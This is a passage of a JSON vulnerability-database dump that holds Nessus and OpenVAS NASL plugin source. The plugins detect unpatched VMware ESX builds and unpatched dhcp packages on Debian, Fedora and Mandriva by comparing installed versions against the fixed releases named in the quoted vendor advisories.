(remote check)\");\n script_summary(english:\"Checks the ESX / ESXi version and build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESX / ESXi host is missing a security-related patch.\nIt is, therefore, affected by multiple vulnerabilities, including\nremote code execution vulnerabilities, in the following components :\n\n - ISC DHCP dhclient\n - Integrated Services Digital Network (ISDN) subsystem\n - Java Runtime Environment (JRE)\n - Java SE Development Kit (JDK)\n - Java SE Web Start\n - Linux kernel\n - Linux kernel 32-bit and 64-bit emulation\n - Linux kernel Simple Internet Transition INET6\n - Linux kernel tty\n - Linux kernel virtual file system (VFS)\n - Red Hat dhcpd init script for DHCP\n - SBNI WAN driver\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2009-0014\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory that\npertains to ESX / ESXi version 3.5 / 4.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 20, 59, 94, 119, 189, 200, 264, 287, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/11/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Host/VMware/vsphere\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"VMware ESX\";\n\nversion = get_kb_item_or_exit(\"Host/VMware/version\");\nrelease = get_kb_item_or_exit(\"Host/VMware/release\");\nport = get_kb_item_or_exit(\"Host/VMware/vsphere\");\n\nfixes = make_array();\nfixes[\"ESX 3.5\"] = 199239;\nfixes[\"ESX 4.0\"] = 219382;\nfixes[\"ESXi 4.0\"] = 208167;\n\nmatches = eregmatch(pattern:'^VMware (ESXi?).*build-([0-9]+)$', string:release);\nif (empty_or_null(matches))\n exit(1, 'Failed to extract the ESX / ESXi build number.');\n\ntype = matches[1];\nbuild = int(matches[2]);\n\nfixed_build = fixes[version];\n\nif (!isnull(fixed_build) && build < fixed_build)\n{\n padding = crap(data:\" \", length:8 - strlen(type)); # Spacing alignment\n\n report = '\\n ' + type + ' version' + padding + ': ' + version +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\n security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);\n}\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware \" + version + \" build \" + build);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2018-04-06T11:40:35", "description": "The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:312.", "cvss3": {}, "published": "2009-12-10T00:00:00", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:312 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062", "CVE-2009-1892", "CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231066386", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066386", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_312.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:312 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in ISC DHCP:\n\nInteger overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before\n3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5 Build\n56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455\nand Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075 and\nACE 2 before 2.0.1 Build 55017, and Server before 1.0.4 Build 56528;\nallows remote attackers to cause a denial of service (daemon crash)\nor execute arbitrary code via a malformed DHCP packet with a large\ndhcp-max-message-size that triggers a stack-based buffer overflow,\nrelated to servers configured to send many DHCP options to clients\n(CVE-2007-0062).\n\nStack-based buffer overflow in the script_write_params method in\nclient/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0\nbefore 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP\nservers to execute arbitrary code via a crafted subnet-mask option\n(CVE-2009-0692).\n\nISC DHCP Server is vulnerable to a denial of service, caused by the\nimproper handling of DHCP requests. If the host definitions are mixed\nusing dhcp-client-identifier and hardware ethernet, a remote attacker\ncould send specially-crafted DHCP requests to cause the server to\nstop responding (CVE-2009-1892).\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:312\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:312.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66386\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2007-0062\", \"CVE-2009-0692\", \"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:312 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.7~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:29", "description": "The remote host is missing an update to dhcp3\nannounced via advisory DSA 1833-2.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1833-2 (dhcp3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892", "CVE-2009-0692"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64756", "href": "http://plugins.openvas.org/nasl.php?oid=64756", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1833_2.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1833-2 (dhcp3)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The previous dhcp3 update (DSA-1833-1) did not properly apply the\nrequired changes to the stable (lenny) version. The old stable (etch)\nversion is not affected by this problem.\n\nThe original advisory description follows.\n\nSeveral remote vulnerabilities have been discovered in ISC's DHCP\nimplementation:\n\nIt was discovered that dhclient does not properly handle overlong\nsubnet mask options, leading to a stack-based buffer overflow and\npossible arbitrary code execution. (CVE-2009-0692)\n\nChristoph Biedl discovered that the DHCP server may terminate when\nreceiving certain well-formed DHCP requests, provided that the server\nconfiguration mixes host definitions using dhcp-client-identifier\nand hardware ethernet. This vulnerability only affects the lenny\nversions of dhcp3-server and dhcp3-server-ldap. (CVE-2009-1892)\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 3.1.1-6+lenny3.\n\nWe recommend that you upgrade your dhcp3 packages.\";\ntag_summary = \"The remote host is missing an update to dhcp3\nannounced via advisory DSA 1833-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201833-2\";\n\n\nif(description)\n{\n script_id(64756);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1833-2 (dhcp3)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"dhcp-client\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:37", "description": "The remote host is missing an update to dhcp\nannounced via advisory FEDORA-2009-8344.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8344 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892", "CVE-2009-0692"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64735", "href": "http://plugins.openvas.org/nasl.php?oid=64735", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8344.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8344 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis update to the dhcp package includes fixes for CVE-2009-0692 and\nCVE-2009-1892.\n\nNote: CVE-2009-0692 had no security consequences on Fedora, thanks\nto the use of FORTIFY_SOURCE\n\nChangeLog:\n\n* Wed Aug 5 2009 David Cantrell - 12:4.0.0-37\n- Fix for CVE-2009-0692\n- Fix for CVE-2009-1892 (#511834)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update dhcp' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8344\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory FEDORA-2009-8344.\";\n\n\n\nif(description)\n{\n script_id(64735);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8344 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511834\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~4.0.0~37.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~4.0.0~37.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.0.0~37.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdhcp4client\", rpm:\"libdhcp4client~4.0.0~37.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdhcp4client-devel\", rpm:\"libdhcp4client-devel~4.0.0~37.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~4.0.0~37.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:48", "description": "The remote host is missing an update to dhcp\nannounced via advisory FEDORA-2009-9075.", "cvss3": {}, "published": "2009-11-17T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-9075 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892", "CVE-2009-0692"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:66252", "href": "http://plugins.openvas.org/nasl.php?oid=66252", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_9075.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-9075 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nDo not require policycoreutils when installing dhcp or dhclient packages. If\nyou have the package installed, the /sbin/restorecon program will be used by\ndhclient-script and the dhcpd init script. This update to the dhcp package\nincludes fixes for CVE-2009-0692 and CVE-2009-1892.\nNote: CVE-2009-0692 had no security consequences on Fedora, thanks to the\nuse of FORTIFY_SOURCE\n\nChangeLog:\n\n* Wed Aug 26 2009 David Cantrell - 12:4.1.0p1-4\n- Do not require policycoreutils for dhclient subpackage, fix restorecon\ncalls in postinstall scriptlets (#519479)\n* Wed Aug 26 2009 David Cantrell - 12:4.1.0p1-3\n- Do not require policycoreutils for post scriptlet (#519479)\n* Thu Aug 6 2009 David Cantrell - 12:4.1.0p1-2\n- Add /usr/lib[64]/pm-utils/sleep.d/56dhclient to handle suspend and\nresume with active dhclient leases (#479639)\n* Wed Aug 5 2009 David Cantrell - 12:4.1.0p1-1\n- Upgrade to dhcp-4.1.0p1, which is the official upstream release to fix\nCVE-2009-0692\n* Wed Aug 5 2009 David Cantrell - 12:4.1.0-25\n- Fix for CVE-2009-0692\n- Fix for CVE-2009-1892 (#511834)\n- Disable patch for #514828 since that fix is still in updates-testing\n* Tue Aug 4 2009 David Cantrell - 12:4.1.0-24\n- Correct lease file format written by dhclient (#514828)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update dhcp' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-9075\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory FEDORA-2009-9075.\";\n\n\n\nif(description)\n{\n script_id(66252);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-17 21:42:12 +0100 (Tue, 17 Nov 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-9075 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=519479\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511834\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~4.1.0p1~4.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~4.1.0p1~4.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.1.0p1~4.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~4.1.0p1~4.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:13", "description": "The remote host is missing an update to dhcp3\nannounced via advisory DSA 1833-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1833-1 (dhcp3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892", "CVE-2009-0692"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64421", "href": "http://plugins.openvas.org/nasl.php?oid=64421", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1833_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1833-1 (dhcp3)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in ISC's DHCP\nimplementation:\n\nIt was discovered that dhclient does not properly handle overlong\nsubnet mask options, leading to a stack-based buffer overflow and\npossible arbitrary code execution. (CVE-2009-0692)\n\nChristoph Biedl discovered that the DHCP server may terminate when\nreceiving certain well-formed DHCP requests, provided that the server\nconfiguration mixes host definitions using dhcp-client-identifier\nand hardware ethernet. This vulnerability only affects the lenny\nversions of dhcp3-server and dhcp3-server-ldap. (CVE-2009-1892)\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 3.0.4-13+etch2.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 3.1.1-6+lenny2.\n\nFor the unstable distribution (sid), these problems will be fixed\nsoon.\n\nWe recommend that you upgrade your dhcp3 packages.\";\ntag_summary = \"The remote host is missing an update to dhcp3\nannounced via advisory DSA 1833-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201833-1\";\n\n\nif(description)\n{\n script_id(64421);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1833-1 (dhcp3)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.0.4-13+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.0.4-13+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.0.4-13+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = 